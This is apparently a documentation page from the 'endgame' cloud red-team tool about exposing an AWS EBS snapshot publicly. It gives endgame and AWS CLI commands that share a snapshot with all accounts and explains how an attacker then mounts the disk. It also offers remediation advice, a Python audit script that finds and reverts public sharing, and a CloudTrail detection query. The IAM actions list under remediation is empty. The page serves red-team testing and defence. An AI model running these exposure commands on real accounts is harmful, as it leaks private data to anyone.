
EBS Snapshot Exposure

Steps to Reproduce

  • To expose the resource using endgame, run the following from the victim account:
export EVIL_PRINCIPAL='*'
export SNAPSHOT_ID=snap-1234567890abcdef0

endgame expose --service ebs --name $SNAPSHOT_ID
  • To expose the resource using the AWS CLI, run the following from the victim account:
export SNAPSHOT_ID=snap-1234567890abcdef0

aws ec2 modify-snapshot-attribute \
    --snapshot-id $SNAPSHOT_ID \
    --attribute createVolumePermission \
    --operation-type add \
    --group-names all
  • To verify that the snapshot has been shared with the public, run the following from the victim account:
export SNAPSHOT_ID=snap-1234567890abcdef0

aws ec2 describe-snapshot-attribute \
    --snapshot-id $SNAPSHOT_ID \
    --attribute createVolumePermission
  • Observe that the contents match the example shown below.

Example

The response of aws ec2 describe-snapshot-attribute will match the below, indicating that the EBS snapshot is public.

{
    "SnapshotId": "snap-066877671789bd71b",
    "CreateVolumePermissions": [
        {
            "Group": "all"
        }
    ]
}

Exploitation

After an EBS Snapshot is made public, an attacker can then:

  • Copy the public snapshot to their own account
  • Use the snapshot to create an EBS volume
  • Attach the EBS volume to their own EC2 instance and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.

Remediation

‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊

  • Encrypt all Snapshots with Customer-Managed Keys: Follow the encryption-related recommendations in the Prevention Guide.
  • Trusted Accounts Only: Ensure that EBS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the EBS Snapshot.
  • Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
  • Restrict access to IAM permissions that could lead to exposure of your EBS Snapshots: Tightly control access to the following IAM actions:

Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here.
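The verification step above and the "Trusted Accounts Only" recommendation can be turned into a repeatable audit. The following script is an added example, not part of the endgame project: it classifies `describe-snapshot-attribute` responses as public, shared with an untrusted account, shared with a trusted account, or private, and emits the `modify-snapshot-attribute --operation-type remove` call that reverts the offending permission. The sample responses, snapshot ids and the `TRUSTED_ACCOUNTS` allow-list are constructed for the example.

```python
# Constructed sample responses in the shape returned by
# `aws ec2 describe-snapshot-attribute --attribute createVolumePermission`;
# the snapshot and account ids are made up for this example.
SAMPLE_RESPONSES = [
    {"SnapshotId": "snap-066877671789bd71b",
     "CreateVolumePermissions": [{"Group": "all"}]},
    {"SnapshotId": "snap-0a1b2c3d4e5f60001",
     "CreateVolumePermissions": [{"UserId": "111122223333"},
                                 {"UserId": "999988887777"}]},
    {"SnapshotId": "snap-0a1b2c3d4e5f60002",
     "CreateVolumePermissions": [{"UserId": "111122223333"}]},
    {"SnapshotId": "snap-0a1b2c3d4e5f60003",
     "CreateVolumePermissions": []},
]

# Assumed allow-list of accounts that may receive shared snapshots.
TRUSTED_ACCOUNTS = {"111122223333"}


def classify_snapshot(response, trusted_accounts):
    """Return (status, untrusted_account_ids) for one describe-snapshot-attribute
    response. A {"Group": "all"} entry means any AWS account can create a volume."""
    perms = response.get("CreateVolumePermissions", [])
    if any(p.get("Group") == "all" for p in perms):
        return "PUBLIC", []
    shared_with = {p["UserId"] for p in perms if "UserId" in p}
    untrusted = sorted(shared_with - set(trusted_accounts))
    if untrusted:
        return "SHARED_UNTRUSTED", untrusted
    return ("SHARED_TRUSTED" if shared_with else "PRIVATE"), []


def remediation_command(snapshot_id, status, untrusted):
    """AWS CLI call that removes the offending createVolumePermission, or None."""
    base = (f"aws ec2 modify-snapshot-attribute --snapshot-id {snapshot_id} "
            f"--attribute createVolumePermission --operation-type remove")
    if status == "PUBLIC":
        return f"{base} --group-names all"
    if status == "SHARED_UNTRUSTED":
        return f"{base} --user-ids {' '.join(untrusted)}"
    return None


def audit(responses, trusted_accounts):
    """Map snapshot id -> (status, untrusted accounts, remediation command)."""
    report = {}
    for r in responses:
        status, untrusted = classify_snapshot(r, trusted_accounts)
        cmd = remediation_command(r["SnapshotId"], status, untrusted)
        report[r["SnapshotId"]] = (status, untrusted, cmd)
    return report
```

In practice the input list would come from calling `describe-snapshot-attribute` for every snapshot returned by `aws ec2 describe-snapshots --owner-ids self`.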

Basic Detection

The following CloudWatch Log Insights query will include exposure actions taken by endgame:

fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifySnapshotAttribute' and requestParameters.attributeType='CREATE_VOLUME_PERMISSION')

This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group. The filter matches on the API action rather than the client, so the same events appear whether the permission was changed by endgame, the AWS CLI or the console; the userAgent field in the output distinguishes them.
